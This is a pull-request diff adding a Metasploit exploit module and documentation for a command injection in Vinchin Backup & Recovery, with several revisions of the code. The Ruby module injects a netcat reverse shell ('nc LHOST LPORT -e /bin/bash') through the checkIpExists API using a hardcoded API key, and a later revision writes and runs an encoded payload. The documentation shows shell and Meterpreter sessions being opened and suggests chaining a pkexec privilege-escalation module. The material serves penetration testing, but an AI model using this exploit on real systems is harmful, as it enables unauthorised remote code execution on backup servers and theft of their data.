### PR TITLE
Submission of New Exploit Module for Vinchin Backup & Recovery Command Injection

### DIFF
--- a/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
@@ -1,101 +1,156 @@
-# Vinchin Backup & Recovery Command Injection Exploit Documentation
+## Vulnerable Application
 
-## Overview
+This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.*, 6.0.*, 6.7.*, and 7.0.*. To prepare the environment:
 
-**Module Name**: `exploit/linux/http/vinchin_backup_recovery_cmd_inject`
+1. Download Vinchin Backup & Recovery version 5.0.*, 6.0.*, 6.7.*, or 7.0.*.
+2. Install the software on a Linux-based server using the downloaded ISO.
+3. During the installation, ensure that the network interface is active and configured.
+4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
 
-**Module Type**: Exploit
+*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
 
-**Platform**: Linux
+## Verification Steps
 
-**Privilege Escalation**: No
-
-**Remote Exploit**: Yes
-
-**Disclosure Date**: 2023-10-26
-
-## Description
-
-A command injection vulnerability exists within the Vinchin Backup & Recovery product. This exploit module takes advantage of this vulnerability by sending a crafted HTTP request containing the injected command. Successful exploitation will result in the execution of arbitrary commands on the target system under the context of the web server user.
-
-## Module Requirements
-
-- Metasploit Framework
-- Network access to the target system via port 443 (or other, if configured)
-
-## Target
-
-Vinchin Backup & Recovery systems with version detected as 7.0.1.26282.
+1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.*, 6.0.*, 6.7.*, or 7.0.*).
+2. Start msfconsole in your Metasploit environment.
+3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
+4. Set the RHOSTS to the target IP address or hostname.
+5. Do: `run`
+6. If the target is vulnerable, the exploit will execute the specified payload or command.
 
 ## Options
 
-- **RHOSTS**: The target address
-- **RPORT**: The target port (default: 443)
-- **SSL**: Specify the use of SSL (default: true)
-- **TARGETURI**: The base path to the Vinchin Backup & Recovery application (default: `/api/`)
-- **APIKEY**: The hardcoded API key required to authenticate to the API
-- **Proxies**: A proxy chain
-- **VHOST**: HTTP server virtual host
+Here are the specific options for the `exploit/linux/http/vinchin_backup_recovery_cmd_inject` module:
 
-## Payload Options
+#### RHOSTS
 
-- **LHOST**: The local host to listen on (interface/IP)
-- **LPORT**: The local port to listen on (default: 4444)
+- **Description**: Specifies the target address or range of addresses.
+- **Default Value**: None. It must be set by the user.
 
-## Usage Instructions
+#### RPORT
 
-1. Use Metasploit to access the module:
-   ```
-   use exploit/linux/http/vinchin_backup_recovery_cmd_inject
-   ```
+- **Description**: The port on which the Vinchin Backup & Recovery service is running.
+- **Default Value**: 443 (this is not configurable in the default Vinchin Backup & Recovery setup).
 
-2. Set the necessary options:
-   ```
-   set RHOSTS <target_ip>
-   set LHOST <local_ip>
-   set APIKEY <api_key>
-   ```
+#### SSL
 
-3. (Optional) Set the payload:
-   ```
-   set payload <payload_name>
-   ```
+- **Description**: Specifies whether to use SSL for the connection.
+- **Default Value**: True, as Vinchin typically runs over HTTPS.
 
-4. Verify the target’s vulnerability:
-   ```
-   check
-   ```
+#### TARGETURI
 
-5. Execute the exploit:
-   ```
-   exploit
-   ```
+- **Description**: The base path to the Vinchin Backup & Recovery application.
+- **Default Value**: `/api/`
+
+#### APIKEY
+
+- **Description**: The hardcoded API key required to authenticate to the API.
+- **Default Value**: `6e24cc40bfdb6963c04a4f1983c8af71`
 
 ## Scenarios
 
-### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
+### Successful Exploitation against Vinchin Backup & Recovery 6.7.*
 
-1. Start `msfconsole` and load the exploit.
-2. Set the `RHOSTS`, `RPORT`, `LHOST`, and any other required options.
-3. Verify the target’s vulnerability with the `check` command.
-4. Run the `exploit` command.
-5. Upon successful exploitation, a shell or other specified payload will be executed on the target.
+This scenario demonstrates exploiting the Vinchin Backup & Recovery version 6.7.* on a Linux server.
 
-**Console Output Example**:
+**Environment**:
+- Vinchin Backup & Recovery 6.7.*
+- Linux Server
+- Metasploit Framework
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the exploit module:
+```
+use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+```
+4. Set the required options:
+```
+set RHOSTS [target IP]
+set APIKEY [API Key]
+```
+5. Optionally set a payload and configure LHOST and LPORT.
+6. Execute the exploit:
+```
+exploit
+```
+
+**Expected Output**:
 
 ```
-msf6 > use exploit/linux/http/vinchin_backup_recovery_cmd_inject
-msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set RHOSTS 192.168.56.1
-msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set LHOST 192.168.56.15
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
+
+Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
+
+   Name       Current Setting        Required  Description
+   ----       ---------------        --------  -----------
+   APIKEY     6e24cc40bfdb6963c04a4  yes       The hardcoded API key
+              f1983c8af71
+   Proxies                           no        A proxy chain of format type:host:
+                                               port[,type:host:port][...]
+   RHOSTS                            yes       The target host(s), see https://do
+                                               cs.metasploit.com/docs/using-metas
+                                               ploit/basics/using-metasploit.html
+   RPORT      443                    yes       The target port (TCP)
+   SSL        true                   no        Negotiate SSL/TLS for outgoing con
+                                               nections
+   SSLCert                           no        Path to a custom SSL certificate (
+                                               default is randomly generated)
+   TARGETURI  /api/                  yes       The base path to the Vinchin Backu
+                                               p & Recovery application
+   URIPATH                           no        The URI to use for this exploit (d
+                                               efault is random)
+   VHOST                             no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to lis
+                                       ten on. This must be an address on the loc
+                                       al machine or 0.0.0.0 to listen on all add
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be spec
+                                     ified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
+rhosts => 192.168.1.3
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set lhost 192.168.1.5
+lhost => 192.168.1.5
 msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
 
 [*] HTTP Response Code: 200
 [*] Detected Vinchin version: 7.0.1.26282
-[+] 192.168.56.1:443 - The target is vulnerable.
-
+[+] 192.168.1.3:443 - The target is vulnerable.
 msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
 
-[*] Started reverse TCP handler on 192.168.56.15:4444 
-...
-[*] Command shell session 1 opened (192.168.56.15:4444 -> 192.168.56.1:443) at 2023-10-26 12:34:56 -0400
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Sending payload...
+[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.3:59354) at 2023-11-16 17:47:30 +0100
+SHELL=/bin/bash script -q /dev/null
+
+bash-4.2$ id
+uid=994(nginx) gid=992(nginx) groups=992(nginx)
+
 ```

--- a/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
@@ -1,17 +1,17 @@
 ## Vulnerable Application
 
-This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.*, 6.0.*, 6.7.*, and 7.0.*. To prepare the environment:
+This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.x, 6.0.x, 6.7.x, and 7.0.x. To prepare the environment:
 
-1. Download Vinchin Backup & Recovery version 5.0.*, 6.0.*, 6.7.*, or 7.0.*.
+1. Download Vinchin Backup & Recovery version 5.0.x, 6.0.x, 6.7.x, or 7.0.x.
 2. Install the software on a Linux-based server using the downloaded ISO.
 3. During the installation, ensure that the network interface is active and configured.
 4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
 
-*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
+*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.x
 
 ## Verification Steps
 
-1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.*, 6.0.*, 6.7.*, or 7.0.*).
+1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.x, 6.0.x, 6.7.x, or 7.0.x).
 2. Start msfconsole in your Metasploit environment.
 3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
 4. Set the RHOSTS to the target IP address or hostname.
@@ -40,7 +40,7 @@ Here are the specific options for the `exploit/linux/http/vinchin_backup_recover
 #### TARGETURI
 
 - **Description**: The base path to the Vinchin Backup & Recovery application.
-- **Default Value**: `/api/`
+- **Default Value**: `/`
 
 #### APIKEY
 
@@ -49,12 +49,12 @@ Here are the specific options for the `exploit/linux/http/vinchin_backup_recover
 
 ## Scenarios
 
-### Successful Exploitation against Vinchin Backup & Recovery 6.7.*
+### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
 
-This scenario demonstrates exploiting the Vinchin Backup & Recovery version 6.7.* on a Linux server.
+This scenario demonstrates exploiting the Vinchin Backup & Recovery version 7.0.1.26282 on a Linux server.
 
 **Environment**:
-- Vinchin Backup & Recovery 6.7.*
+- Vinchin Backup & Recovery 7.0.1.26282
 - Linux Server
 - Metasploit Framework
 
@@ -83,45 +83,53 @@ msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
 
 Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
 
-   Name       Current Setting        Required  Description
-   ----       ---------------        --------  -----------
-   APIKEY     6e24cc40bfdb6963c04a4  yes       The hardcoded API key
-              f1983c8af71
-   Proxies                           no        A proxy chain of format type:host:
-                                               port[,type:host:port][...]
-   RHOSTS                            yes       The target host(s), see https://do
-                                               cs.metasploit.com/docs/using-metas
-                                               ploit/basics/using-metasploit.html
-   RPORT      443                    yes       The target port (TCP)
-   SSL        true                   no        Negotiate SSL/TLS for outgoing con
-                                               nections
-   SSLCert                           no        Path to a custom SSL certificate (
-                                               default is randomly generated)
-   TARGETURI  /api/                  yes       The base path to the Vinchin Backu
-                                               p & Recovery application
-   URIPATH                           no        The URI to use for this exploit (d
-                                               efault is random)
-   VHOST                             no        HTTP server virtual host
+   Name       Current Setting               Required  Description
+   ----       ---------------               --------  -----------
+   APIKEY     6e24cc40bfdb6963c04a4f1983c8  yes       The hardcoded API key
+              af71
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:
+                                                      port][...]
+   RHOSTS                                   yes       The target host(s), see https://docs.metasploit.co
+                                                      m/docs/using-metasploit/basics/using-metasploit.ht
+                                                      ml
+   RPORT      443                           yes       The target port (TCP)
+   SSL        true                          no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                  no        Path to a custom SSL certificate (default is rando
+                                                      mly generated)
+   TARGETURI  /                             yes       The base path to the Vinchin Backup & Recovery app
+                                                      lication
+   URIPATH                                  no        The URI to use for this exploit (default is random
+                                                      )
+   VHOST                                    no        HTTP server virtual host
 
 
    When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
-   SRVHOST  0.0.0.0          yes       The local host or network interface to lis
-                                       ten on. This must be an address on the loc
-                                       al machine or 0.0.0.0 to listen on all add
-                                       resses.
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                        address on the local machine or 0.0.0.0 to listen on all address
+                                       es.
    SRVPORT  8080             yes       The local port to listen on.
 
 
-Payload options (generic/shell_reverse_tcp):
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
 
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be spec
-                                     ified)
-   LPORT  4444             yes       The listen port
+   Name                Current Setting            Required  Description
+   ----                ---------------            --------  -----------
+   FETCH_COMMAND       CURL                       yes       Command to fetch payload (Accepted: CURL, FT
+                                                            P, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false                      yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      JSSwiKfcOw                 no        Name to use on remote system when storing pa
+                                                            yload; cannot contain spaces.
+   FETCH_SRVHOST                                  no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080                       yes       Local port to use for serving payload
+   FETCH_URIPATH                                  no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /usr/share/nginx/vinchin/  yes       Remote writable dir to store payload; cannot
+                       tmp                                   contain spaces.
+   LHOST               192.168.1.5                yes       The listen address (an interface may be spec
+                                                            ified)
+   LPORT               4444                       yes       The listen port
 
 
 Exploit target:
@@ -136,21 +144,24 @@ View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
 rhosts => 192.168.1.3
-msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set lhost 192.168.1.5
-lhost => 192.168.1.5
 msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
 
-[*] HTTP Response Code: 200
 [*] Detected Vinchin version: 7.0.1.26282
 [+] 192.168.1.3:443 - The target is vulnerable.
 msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.5:4444 
-[*] Sending payload...
-[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.3:59354) at 2023-11-16 17:47:30 +0100
-SHELL=/bin/bash script -q /dev/null
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Vinchin version: 7.0.1.26282
+[+] The target is vulnerable.
+[*] Sending stage (3045380 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:58960) at 2023-11-21 02:00:57 +0100
 
-bash-4.2$ id
-uid=994(nginx) gid=992(nginx) groups=992(nginx)
+meterpreter > sysinfo 
+Computer     : localhost.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
 
 ```

--- a/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
@@ -7,7 +7,7 @@ This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.x
 3. During the installation, ensure that the network interface is active and configured.
 4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
 
-*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.x
+*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
@@ -1,0 +1,101 @@
+# Vinchin Backup & Recovery Command Injection Exploit Documentation
+
+## Overview
+
+**Module Name**: `exploit/linux/http/vinchin_backup_recovery_cmd_inject`
+
+**Module Type**: Exploit
+
+**Platform**: Linux
+
+**Privilege Escalation**: No
+
+**Remote Exploit**: Yes
+
+**Disclosure Date**: 2023-10-26
+
+## Description
+
+A command injection vulnerability exists within the Vinchin Backup & Recovery product. This exploit module takes advantage of this vulnerability by sending a crafted HTTP request containing the injected command. Successful exploitation will result in the execution of arbitrary commands on the target system under the context of the web server user.
+
+## Module Requirements
+
+- Metasploit Framework
+- Network access to the target system via port 443 (or other, if configured)
+
+## Target
+
+Vinchin Backup & Recovery systems with version detected as 7.0.1.26282.
+
+## Options
+
+- **RHOSTS**: The target address
+- **RPORT**: The target port (default: 443)
+- **SSL**: Specify the use of SSL (default: true)
+- **TARGETURI**: The base path to the Vinchin Backup & Recovery application (default: `/api/`)
+- **APIKEY**: The hardcoded API key required to authenticate to the API
+- **Proxies**: A proxy chain
+- **VHOST**: HTTP server virtual host
+
+## Payload Options
+
+- **LHOST**: The local host to listen on (interface/IP)
+- **LPORT**: The local port to listen on (default: 4444)
+
+## Usage Instructions
+
+1. Use Metasploit to access the module:
+   ```
+   use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+   ```
+
+2. Set the necessary options:
+   ```
+   set RHOSTS <target_ip>
+   set LHOST <local_ip>
+   set APIKEY <api_key>
+   ```
+
+3. (Optional) Set the payload:
+   ```
+   set payload <payload_name>
+   ```
+
+4. Verify the target’s vulnerability:
+   ```
+   check
+   ```
+
+5. Execute the exploit:
+   ```
+   exploit
+   ```
+
+## Scenarios
+
+### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
+
+1. Start `msfconsole` and load the exploit.
+2. Set the `RHOSTS`, `RPORT`, `LHOST`, and any other required options.
+3. Verify the target’s vulnerability with the `check` command.
+4. Run the `exploit` command.
+5. Upon successful exploitation, a shell or other specified payload will be executed on the target.
+
+**Console Output Example**:
+
+```
+msf6 > use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set RHOSTS 192.168.56.1
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set LHOST 192.168.56.15
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
+
+[*] HTTP Response Code: 200
+[*] Detected Vinchin version: 7.0.1.26282
+[+] 192.168.56.1:443 - The target is vulnerable.
+
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
+
+[*] Started reverse TCP handler on 192.168.56.15:4444 
+...
+[*] Command shell session 1 opened (192.168.56.15:4444 -> 192.168.56.1:443) at 2023-10-26 12:34:56 -0400
+```

--- a/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+++ b/documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
@@ -165,3 +165,6 @@ BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 
 ```
+
+Note: All instances of this exploit can be subject to privilege escalation using the
+`exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module in the Metasploit environment.

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -28,8 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2023-45498'],
           ['CVE', '2023-45499'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45498'],
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45499'],
           ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
           ['URL', 'https://vinchin.com/'] # Vendor URL
         ],

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-
+  prepend Msf::Exploit::Remote::AutoCheck
   def initialize(info = {})
     super(
       update_info(

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -102,7 +102,6 @@ else
 end
 
     else
-      print_error('Unable to extract version with the regex provided.')
       return CheckCode::Unknown('Unable to extract version.')
     end
   end

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -85,6 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi('uri' => target_uri_path)
 
     return CheckCode::Unknown('Failed to connect to the target.') unless res
+    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
 
     version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
     version_match = res.body.match(version_pattern)

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
        (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
        (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
        (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
-      return CheckCode::Vulnerable
+      return CheckCode::Appears
     else
       return CheckCode::Safe
     end

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
   prepend Msf::Exploit::Remote::AutoCheck
+
   def initialize(info = {})
     super(
       update_info(

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
     version_match = res.body.match(version_pattern)
 
-    if !version_match || !version_match[1]
+    unless version_match && version_match[1]
       return CheckCode::Unknown('Unable to extract version.')
     end
 

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [ REPEATABLE_SESSION ],
           'AKA' => ['Vinchin Command Injection']
         },
-        'Platform' => ['linux'],
+        'Platform' => ['linux', 'unix'],
         'Targets' => [
           ['Automatic', {}]
         ],
@@ -63,12 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status('Generating reverse shell command...')
     lhost = datastore['LHOST']
     lport = datastore['LPORT']
     injection_command = "nc #{lhost} #{lport} -e /bin/bash"
-
-    print_status('Sending reverse shell payload...')
+    data = "p={\"ip\":\"127.0.0.1 ;#{injection_command};\"}"
+    print_status('Sending payload...')
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(datastore['TARGETURI']),
@@ -77,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'f' => 'checkIpExists',
         'k' => datastore['APIKEY']
       },
-      'data' => "p={\"ip\":\"127.0.0.1 ;#{injection_command}\"}"
+      'data' => data
     })
   end
 
@@ -99,10 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Detected Vinchin version: #{version}")
 
       vulnerable_version_patterns = [
-        /^5\.0\.\d+(\.\d+)?$/,
-        /^6\.0\.\d+(\.\d+)?$/,
-        /^6\.7\.\d+(\.\d+)?$/,
-        /^7\.0\.\d+(\.\d+)?$/
+        /^((5\.0|6\.0|6\.7)\.\d+(\.\d+)?|7\.0\.(0|1)(\.\d+)?)$/
       ]
 
       version = Rex::Version.new(version)
@@ -112,9 +108,9 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       if vulnerable
-        return CheckCode::Vulnerable("Detected vulnerable version: #{version}")
+        return CheckCode::Vulnerable()
       else
-        return CheckCode::Safe("Detected non-vulnerable version: #{version}")
+        return CheckCode::Safe()
       end
 
     else

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -1,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Vinchin Backup and Recovery Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Vinchin Backup & Recovery
+          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the
+          checkIpExists API endpoint, an attacker can execute arbitrary commands as the
+          web server user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gregory Boddin (LeakIX)', # Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-45498'],
+          ['CVE', '2023-45499'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45498'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-45499'],
+          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
+          ['URL', 'https://vinchin.com/'] # Vendor URL
+        ],
+        'DisclosureDate' => '2023-10-26',
+        'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'AKA'         => ['Vinchin Command Injection']
+        }
+        'Platform' => ['linux'],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'generic/shell_reverse_tcp',
+          'SSL' => true
+        },
+        'Privileged' => false
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/api/']),
+        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71'])
+      ]
+    )
+  end
+
+  def exploit
+    print_status('Generating reverse shell command...')
+    lhost = datastore['LHOST']
+    lport = datastore['LPORT']
+    injection_command = "nc #{lhost} #{lport} -e /bin/bash"
+
+    print_status('Sending reverse shell payload...')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'vars_get' => {
+        'm' => '30',
+        'f' => 'checkIpExists',
+        'k' => datastore['APIKEY']
+      },
+      'data' => "p={\"ip\":\"127.0.0.1 ;#{injection_command}\"}"
+    })
+  end
+
+  def check
+    target_uri_path = normalize_uri(target_uri.path.split('/')[0], '/login.php')
+    res = send_request_cgi('uri' => target_uri_path)
+
+    unless res
+      print_error('Failed to connect to the target.')
+      return CheckCode::Unknown('Failed to connect to the target.')
+    end
+
+    print_status("HTTP Response Code: #{res.code}")
+    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
+    version_match = res.body.match(version_pattern)
+
+    if version_match && version_match[1]
+      version = Rex::Version.new(version_match[1])
+      print_status("Detected Vinchin version: #{version}")
+
+      vulnerable_version_patterns = [
+        /^5\.0\.\d+(\.\d+)?$/,
+        /^6\.0\.\d+(\.\d+)?$/,
+        /^6\.7\.\d+(\.\d+)?$/,
+        /^7\.0\.\d+(\.\d+)?$/
+      ]
+
+      vulnerable = vulnerable_version_patterns.any? { |pattern| pattern.match?(version.to_s) }
+
+      if vulnerable
+        return CheckCode::Vulnerable("Detected vulnerable version: #{version}")
+      else
+        return CheckCode::Safe("Detected non-vulnerable version: #{version}")
+      end
+    else
+      print_error('Unable to extract version with the regex provided.')
+      return CheckCode::Unknown('Unable to extract version.')
+    end
+  end
+end

--- a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -67,10 +67,10 @@ class MetasploitModule < Msf::Exploit::Remote
     formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join
 
     temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
-    command = "echo -ne #{formatted_payload} | tee #{temp_file}; chmod 777 #{temp_file}; #{temp_file}; rm #{temp_file}"
+    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"
     send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI'], '/api/'),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),
       'vars_get' => {
         'm' => '30',
         'f' => 'checkIpExists',
@@ -81,28 +81,28 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    target_uri_path = normalize_uri(target_uri.path, '/login.php')
+    target_uri_path = normalize_uri(target_uri.path, 'login.php')
     res = send_request_cgi('uri' => target_uri_path)
 
-    return CheckCode::Unknown('Failed to connect to the target.') unless res
+    return CheckCode::Unknown.new('Failed to connect to the target.') unless res
 
     version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
     version_match = res.body.match(version_pattern)
 
-    if version_match && version_match[1]
-      version = Rex::Version.new(version_match[1])
-      print_status("Detected Vinchin version: #{version}")
+    if !version_match || !version_match[1]
+      return CheckCode::Unknown.new('Unable to extract version.')
+    end
 
-      if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
-         (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
-         (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
-         (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
-        return CheckCode::Vulnerable
-      else
-        return CheckCode::Safe
-      end
+    version = Rex::Version.new(version_match[1])
+    print_status("Detected Vinchin version: #{version}")
+
